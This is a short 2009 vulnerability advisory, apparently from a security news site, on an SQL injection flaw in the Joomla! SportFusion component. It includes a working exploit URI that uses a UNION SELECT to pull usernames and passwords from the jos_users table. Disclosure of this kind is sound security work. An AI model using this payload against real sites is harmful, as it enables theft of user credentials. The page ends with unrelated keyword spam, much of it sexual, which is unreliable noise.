about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Joomla! SportFusion Component SQL Injection Vulnerability


Title Joomla! SportFusion Component SQL Injection Vulnerability
Published 2009-09-22-12:00AM
Updated 2009-09-23-04:10PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  kaMtiEz
Vulnerable  Kinfusion SportFusion 0.2.3
Kinfusion SportFusion 0.2.2
Not Vulnerable  
Code  Attackers can use a browser to exploit this issue.The following example URI is available: http://www.example.com/index.php?option=com_sportfusion&view=teamdetail&cid[0]=-666+union+select+1,2,3,4,5,concat(0x3a,username,password)kaMtiez,7,8,9,10,11,12,13+from+jos_users--
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sun, 22 Nov 2009 15:12:58 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
200 /compo fents4y48` www.cctvyy Sexy pictu Www.sxs.co Sexiesttee +www98.com qiugou.net sweet puss cat /home/ wwwxxxx cnvike.cn http://www fax www.bobo11 free xxx c info.php?l PHP%252520 Free vede component/ Jabier photos of ip board 2 dx852.cn BIND 9.2.5 dailer ton Arab porn teeniesxxx sex picher php-nuke 2 ip board 2 drweb s....4irc. www.gssye. SEXOLDERWO Pak sex vi Sex wman joomla rem 18agegrils WWWSEX.COM Sex negro vidyo sex www.sexins womenandan dragon bal Samirasex phpsecurit class VIII t433t qiugou.net